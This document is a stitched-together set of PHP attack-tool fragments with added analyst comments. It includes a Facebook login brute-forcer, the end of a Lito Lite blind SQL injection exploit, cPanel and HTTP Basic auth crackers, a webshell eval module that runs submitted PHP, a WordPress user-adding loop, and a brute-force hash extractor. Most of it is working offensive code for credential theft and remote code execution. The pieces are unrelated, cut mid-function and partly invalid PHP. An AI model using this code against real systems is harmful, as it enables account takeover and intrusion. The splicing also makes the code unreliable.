<?php 
    // Tries one username/password pair against the Facebook mobile login
    // endpoint and prints a colored result line. Observable indicators of this
    // tool: the fixed URL with login_attempt=1, a bare "Chrome/36.0.1985.125"
    // User-Agent with no Mozilla prefix, and repeated POSTs of email/pass fields
    // from a single source. eregi() was removed in PHP 7.0, so this does not run
    // on current PHP versions.
    function brute($user, $pass)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
        curl_setopt($ch, CURLOPT_HEADER, 0);
        // TLS certificate verification is disabled for this request.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
        // Credentials are interpolated into the body without urlencode().
        curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
        curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
        $login = curl_exec($ch);
        // Presence of the login form's class marker in the response is taken
        // as "login failed"; its absence is reported as success.
        $check = eregi('class="s t i u"', $login) ? true : false;
        if ($check == true) {
            echo "No  || Username : <font color='red'>{$user}</font>&nbsp;  Password : <font color='red'>{$pass}</font></font></p>";
        } else {
            echo "yes || Username: <font color='green'>{$user}</font>&nbsp; Password : <font color='green'>{$pass}</font></font></p>";
        }
        // The cURL handle is never released with curl_close(); nothing is returned.
    }
    // Newline-separated lists are read straight from the POST body (no isset()
    // check) and every username is tried against every password.
    $username = explode("\n", $_POST['username']);
    $password = explode("\n", $_POST['password']);
    foreach ($username as $users) {
        // @ only suppresses warnings from trim(); it does not guard the $_POST reads above.
        $users = @trim($users);
        foreach ($password as $pass) {
            $pass = @trim($pass);
            // brute() echoes its own result and returns null, so this echo adds nothing.
            echo brute($users, $pass);
        }
    }
} else {
    header("location:../croak");
}
    $chr = 0;
    while ($chr < strlen($key)) {
        if (check($host, $path, $fld, $pos, $key[$chr])) {
            $res .= $key[$chr];
            $chr = -1;
            $pos++;
        }
        $chr++;
    }
    return $res;
}
// Prints the banner and usage text, then terminates the script.
// Note: $argv is not a superglobal and there is no `global $argv;` here, so
// inside this function $argv[0] is undefined and the usage lines print
// without the script name.
function usage()
{
    echo "[+] Lito Lite Blind SQL Injection Exploit\n" . "[+] Author: darkjoker ~ http://darkjokerside.altervista.org ~ darkjoker93[at]gmail[dot]com\n" . "[+] Usage: php " . $argv[0] . " <hostname> <path> [key]\n" . "[+] Ex. php " . $argv[0] . " localhost /lito_lite abcdefghijklmnopqrstuvwxyz0123456789\n" . "[+] Greetz to athos, marco6\n";
    exit;
}
// CLI entry: <hostname> and <path> are required; an optional third argument
// replaces the default candidate alphabet handed to the per-character routine
// whose beginning is cut off above this listing.
if (count($argv) < 3) {
    usage();
}
$host = $argv[1];
$path = $argv[2];
// empty() also treats the string "0" as missing, so a literal "0" alphabet
// silently falls back to the default set.
if (empty($argv[3])) {
    $key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
} else {
    $key = $argv[3];
}
// The two calls on this line were redacted in the published listing ("******");
// as printed, this line is not valid PHP.
echo "[+] Username: "******"username", $key) . "\n" . "[+] Password: "******"password", $key) . "\n";
?>

# milw0rm.com [2009-01-03]
                        }
                    }
                }
                // cPanel credential-check branch. "cpanel2" selects port 23,
                // anything else port 2082. $cpanel_port is not passed to
                // cpanel_check() below, so presumably it is read as a global —
                // TODO confirm in cpanel_check(). Detection angle: bursts of
                // authentication attempts to 2082/23 originating from a web server.
                if ($cracktype == "cpanel" || $cracktype == "cpanel2") {
                    if ($cracktype == "cpanel2") {
                        $cpanel_port = "23";
                    } else {
                        $cpanel_port = "2082";
                    }
                    foreach ($userlist as $user) {
                        $pureuser = trim($user);
                        print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\"  style=\"font-size: 9pt\" color=\"#FF0800\">\r\n   Please put some good password to crack user {$pureuser}    :(  ... </font></b>";
                        // POST field bruteforce=true hands off to brute() (defined
                        // elsewhere, called without arguments); otherwise every entry
                        // of $passlist is tried for this user via cpanel_check().
                        if ($_POST['bruteforce'] == "true") {
                            echo " bruteforcing ..";
                            echo "<br>";
                            brute();
                        } else {
                            echo "<br>";
                            foreach ($passlist as $password) {
                                $purepass = trim($password);
                                cpanel_check($target, $pureuser, $purepass, $connect_timeout);
                            }
                        }
                    }
                    // getmicrotime() and $time_start are defined outside this block.
                    $time_end = getmicrotime();
                    $time = $time_end - $time_start;
                    print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">\r\n Cracking Finished. Elapsed time: {$time}</font> seconds</b><br><br>";
                }
            }
            ?>
        echo "<option value=\"lib:lib\">lib:lib</option>";
    }
    echo "</select></td></tr>";
    echo "<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">";
    echo "<OPTION value=\"mysql\">mysql</option>\n       <option value=\"ftp\">ftp</option>";
    // if(function_exists(ssh2_connect)){
    //  echo "<option value=\"ssh\">ssh</option>";
    // }
    echo "</select></td>";
    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"" . $host . "\">(for lib:lib)</td></tr>";
    if (function_exists(fopen)) {
        echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"" . $lib . "\">";
    }
    echo "</table></form>";
    if ($_POST['b_brute']) {
        brute($_POST['box'], $_POST['box1'], $_POST['brute_host'], $_POST['lib']);
    }
}
#################### Eval ######################################################
if ($r_act == "eval") {
    if ($_POST['b_eval']) {
        $eval = str_replace("<?", "", $_POST['php_eval']);
        $eval = str_replace("?>", "", $eval);
        eval($eval);
    }
    echo "<form action=\"" . $HTTP_REFERER . "\" method=\"POST\" enctype=\"multipart/form-data\">";
    echo "<input type=\"hidden\" value='" . $r_act . "' name=\"r_act\">";
    echo "<table BORDER=1 align=center>";
    echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Eval php: </b></td></tr><font size=-2>";
    echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>";
    echo "</tr></table></form>";
// Webshell "HTTP Auth cracker" module. With a posted target it replays HTTP
// Basic credentials (wordlist or generated) over plain port 80 and prints hits;
// without one it renders the input form.
// Defender notes grounded in this code: the form pre-fills the target with this
// same host's /admin/ (getenv('HTTP_HOST')); hits are appended to a ".log" file
// in the temp directory returned by whereistmP(); every probe is an HTTP/1.0
// request with "Accept-Encoding: text", a Referer equal to the bare host,
// "Connection: Close", an Authorization: Basic header and no User-Agent.
// brute(), file_add_contentS() and whereistmP() are defined elsewhere.
function authcrackeR()
{
    global $hcwd;
    if (!empty($_REQUEST['target'])) {
        if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
            $log = 1;
            $file = $_REQUEST['logfilE'];
        } else {
            $log = 0;
        }
        $data = '';
        // Truthiness test: the form sends "1" for POST and "0" for GET.
        $method = $_REQUEST['method'] ? 'POST' : 'GET';
        // A query string is split off the target and kept as the request body.
        if (strstr($_REQUEST['target'], '?')) {
            $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
            $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
        }
        $u = parse_url($_REQUEST['target']);
        $host = $u['host'];
        $page = $u['path'];
        $type = $_REQUEST['combo'];
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
        // For GET the query is re-appended without the '?' that was stripped above.
        if ($method == 'GET') {
            $page .= $data;
        }
        echo '<font color=#FA0>';
        if ($_REQUEST['mode'] == 'wl') {
            // Wordlist mode: one candidate per line; combo mode expects "user:pass".
            $dictionary = fopen($_REQUEST['dictionary'], 'r');
            while (!feof($dictionary)) {
                if ($type) {
                    $combo = trim(fgets($dictionary), " \n\r");
                    $user = substr($combo, 0, strpos($combo, ':'));
                    $pass = substr($combo, strpos($combo, ':') + 1);
                } else {
                    $pass = trim(fgets($dictionary), " \n\r");
                }
                // Port 80 is hard-coded; HTTPS targets are not reachable this way.
                $so = @fsockopen($host, 80, $en, $es, 5);
                if (!$so) {
                    echo "Can not connect to host";
                    break;
                } else {
                    $packet = "{$method} {$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
                    // Single-quoted string: the '\\r\\n' here is sent as literal
                    // backslash characters, not as a CRLF line terminator.
                    if ($method == 'POST') {
                        $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
                    }
                    $packet .= "\r\n\r\n";
                    $packet .= $data;
                    fputs($so, $packet);
                    // Characters 9-10 of the status line: "20" means any 2xx status.
                    $res = substr(fgets($so), 9, 2);
                    fclose($so);
                    if ($res == '20') {
                        echo "U: {$user} P: {$pass}</br>";
                        if ($log) {
                            file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
                        }
                    }
                }
            }
        } else {
            // Generated mode: a PHP source snippet is assembled as a string and
            // handed to brute() together with the mode and length bounds; the
            // snippet itself is also echoed to the page.
            $code = '
			$so = @fsockopen ( "' . $host . '", 80, $en, $es, 5 );
			$packet = "' . $method . " {$page} " . 'HTTP/1.0\\r\\nAccept-Encoding: text\\r\\nHost: ' . $host . '\\r\\nReferer: ' . $host . '\\r\\nConnection: Close\\r\\nAuthorization: Basic "
			. base64_encode ( "' . $user . ':".$word )."\\r\\n"';
            if ($method == "POST") {
                $code .= ".'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen("'{$data}'") . "'";
            }
            $code .= "\r\n\r\n" . $data . ';fputs ( $so, $packet );	$test= ( substr ( fgets ( $so ), 9, 2 ) == "20");';
            echo $code;
            // Precedence: `=` binds weaker than `!=`, so $res receives the boolean
            // result of the comparison, not brute()'s return value.
            if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code) != null) {
                echo "<b>{$user}:{$res}</b><br />";
            }
        }
        echo 'Done!</font>';
    } else {
        // Form view. Target defaults to this host's own /admin/ path, logging is
        // on by default, and the log path points into the temp directory.
        echo '
<form name=cracker method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">HTTP Auth cracker</label>
</div><div class="fieldwrapper">
<label class="styled">Target:</label>
<div class="thefield">
<input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/admin/" size="30" />
</div>
</div>
<div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield">
<select name="mode" id="mode" onChange="toggle()">
<option value="09">Bruteforce [0-9]</option>
<option value="az">Bruteforce [a-z]</option>
<option value="az09">Bruteforce [a-z] [0-9]</option>
<option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option>
<option value="all">Bruteforce [ALL]</option>
<option value="wl">Wordlist</option>
</select>
</div></div>
<div class="fieldwrapper" id="dic">
<label class="styled">Dictionary:</label>
<div class="thefield">
<input type="text" name="dictionary" size="30" />
</div>
</div><div class="fieldwrapper" id="fcr">
<label class="styled">Dictionary type:</label>
<div class="thefield">
<ul style="margin-top:0;">
<li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li>
<li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li>
</ul>
</div>
</div>
<div class="fieldwrapper">
<label class="styled">Method:</label>
<div class="thefield">
<select name="method"><option selected value="1">POST</option><option value="0">GET</option></select>
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label>
<div class="thefield">
<input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log">
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="start" value="Start" style="margin-left: 150px;" />
</div>
</form><script>toggle();</script>';
    }
}
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                        curl_setopt($ch, CURLOPT_HEADER, 1);
                        curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
                        curl_setopt($ch, CURLOPT_POSTFIELDS, "user={$user_login}&passi={$pass1}&passii={$pass2}&_wpnonce_create=code=&redirect_to=.{$victim}./author/{$user_login}");
                        $check = curl_exec($ch);
                        if (eregi('$user_login', $check)) {
                            echo "<p><font face='Verdana' size='1'>[+] Username Has Been Successfully Added  : <font color='#008000'>{$user_login} = {$victim}</font></p>";
                        } else {
                            echo "<font face='Tahoma' size='2' color='red'> => Incorrect Code Trying More...</font><br>";
                        }
                    }
                    foreach ($user_login as $user) {
                        foreach ($pass1 as $passi) {
                            foreach ($pass2 as $passii) {
                                brute($code);
                            }
                        }
                    }
                    curl_close($ch);
                }
            }
        }
    }
    if (isset($_GET['action']) && $_GET['action'] == 'rootshelleexecbpass') {
        echo '<center><b class="conte">
<a href="?action=grasy">Bypass /etc/passwd</a> -
<a href="?action=nemcon">Bypass Users Server</a> -
<a href="?action=cgipl">Bypass Perl Security</a> -
<a href="?action=bypsrootwzp">Bypass With Zip File</a> -
<a href="?action=bforb">Bypass system function</a> -
} else {
    // Parse "-xVALUE"-style arguments: the flag letter is the character at
    // offset 1 and the value starts at offset 3, so the character at offset 2
    // (e.g. a space or '=') is skipped. The first occurrence of a flag wins.
    $ARG = array();
    foreach ($argv as $arg) {
        if (strpos($arg, '-') === 0) {
            $key = substr($arg, 1, 1);
            if (!isset($ARG[$key])) {
                $ARG[$key] = substr($arg, 3, strlen($arg));
            }
        }
    }
    // $ARG[s] and $ARG[u] use bare (undefined) constants: PHP < 8 coerces them to
    // the strings "s"/"u" with a notice, PHP 8 throws an Error here.
    if ($ARG[s] && $ARG[u]) {
        $server = $ARG[s];
        // The supplied id is decremented before use — presumably converting to a
        // zero-based index expected by brute(); confirm against brute().
        $User_id = intval($ARG[u]);
        $User_id--;
        print "[+] Phase 1 brute login.\n";
        $login = brute($User_id, "Login");
        print "\n[+] Phase 1 successfully finished: {$login}\n";
        print "[+] Phase 2 brute password-hash.\n";
        $hash = brute($User_id, "Password");
        print "\n[+] Phase 2 successfully finished: {$hash}\n";
        // brute(), successfully() and help_argc() are defined outside this listing.
        successfully($login, $hash);
    } else {
        help_argc($argv[0]);
        exit(0);
    }
}
?>
 

# milw0rm.com [2008-12-23]